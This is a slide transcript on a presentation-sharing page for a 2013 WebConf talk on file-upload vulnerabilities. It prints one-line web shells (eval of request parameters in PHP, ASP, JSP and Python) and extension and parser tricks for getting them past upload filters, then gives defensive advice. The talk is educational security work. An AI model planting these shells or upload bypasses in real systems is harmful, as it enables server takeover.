Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Best Practices - The Upload

Orange
August 21, 2024
0
17

Best Practices - The Upload

Webconf 2013

Orange

August 21, 2024
Tweet

More Decks by Orange

See All by Orange
Security in PHP 那些在滲透測試的小技巧
p8361
0
27
網頁安全 Web Security 入門
p8361
0
34
Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞
p8361
13
36k
那些 Web Hacking 中的奇技淫巧
p8361
16
14k
關於 HITCON CTF 的那些事 之 Web 狗如何在險惡的 CTF 世界中存活?
p8361
6
12k
PHPConf 2013 - 矛盾大對決
p8361
53
28k
0-Day 輕鬆談 - Happy Fuzzing Internet Explorer
p8361
15
12k
駭客看 Django
p8361
25
12k

Featured

See All Featured
Building Adaptive Systems
keathley
38
2.3k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
44
6.8k
Designing for Performance
lara
604
68k
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
33
1.9k
Build The Right Thing And Hit Your Dates
maggiecrowley
33
2.4k
The Cost Of JavaScript in 2023
addyosmani
45
6.7k
Scaling GitHub
holman
458
140k
The Cult of Friendly URLs
andyhume
78
6k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
109
49k
Thoughts on Productivity
jonyablonski
67
4.3k
Done Done
chrislema
181
16k
Agile that works and the tools we love
rasmusluckow
327
21k

Transcript

  1. 2013/01/13 @ WebConf <[email protected]>

  2. • aka Orange • 2009 • 2011, 2012 • 2011

    AVTOKYO • 2012 PHP Conf • 2012 VXRLConf • – – Web Security – Windows Vulnerability Exploitation

  3. • CHROOT Security Group • NISRA • Disclosed – MS12-071

    / CVE-2012-4775 • http://blog.orange.tw/
  4. None
  5. None

  6. 1. Reconnaissance – Google Hacking, Reversed Whois, AXFR …… 2.

    Scanning – SYN/ACK Scan, TCP NULL/FIN/Xmas/Mainmon/Window Scan, SCTP INIT Scan, Hydra, Nessus …… 3. Gaining Access – Heap/Stack/V-table Overflow, ROP, Heap Spray, System Misconfiguration, Metasploit, Exploit Database …… 4. Maintaining Access – Privilege Escalation, Trojan, Backdoor, Rootkit, Code/DLL Injection, API Hook, LD_PRELOAD, Anti AV/Debugger …… 5. Clearing Tracks – Syslog, WTMP/UTMP, Event Log, Shell(Bash/Explorer) ……
  7. None

  8. – Upload? – Web log? Dabase log?

  9. • • – <?php eval( $_REQUEST[cmd] );?> – Runtime.getRuntime().exec( cmd

    ) – <%eval request("cmd") %> – __import__('os').system(cmd)

  10. https://github.com/evilcos/python-webshell/

  11. None
  12. None
  13. None
  14. None
  15. None
  16. None
  17. None

  18. http://www.lu-chen.com/

  19. None
  20. None

  21. • – PHP CGI PATH_INFO • – /index.php/module/login – /index/module/login

    • – /userfiles/mypic.jpg – /userfiles/mypic.jpg/nihao.php

  22. • – Huffman table – EXIF • – copy /b

    rst.jpg+backdoor.php dst.jpg • – http://orange.tw/exif.jpg
  23. None
  24. None

  25. • • • •

  26. • – – – • – php phtml php3 php4

    php5 – asp asa cer cdx shtml – aspx asax ascx ashx asmx http://www.hitcon.org/download/2010/5_Flash Exploit.pdf#Page.20
  27. None

  28. – AddHandler application/x-httpd-php .jpg • – .php*

  29. None

  30. https://speakerdeck.com/allenown/the-internet-is-not-safe-webconf-taiwan-2013

  31. https://www.facebook.com/TWWDB

  32. (htaccess ^ ^)

  33. • • – user.jpg  .jpg – user.php.jpg  .jpg

    – user.php.xxx  .php – user.php.xxx.ooo  .php
  34. None

  35. • – IIS < 7 – Asp.net ^__< • –

    http://webconf.orange.tw/files/a.asp/user.jpg • – http://webconf.orange.tw/files/user.asp;aa.jpg user.asp;aa.jpg
  36. None
  37. None

  38. filename Content-Type File header

  39. None

  40. • Update your sense and software. • User controlled filename

    is always dangerous. – Whatever filename, extension or temporary filename. • Use Image library to valid or strip the image. • Disabled the directory’s execution permission you uploaded to.

  41. • • – htaccess • – Apache – IIS •

  42. None

  43. Q & A

  44. [email protected]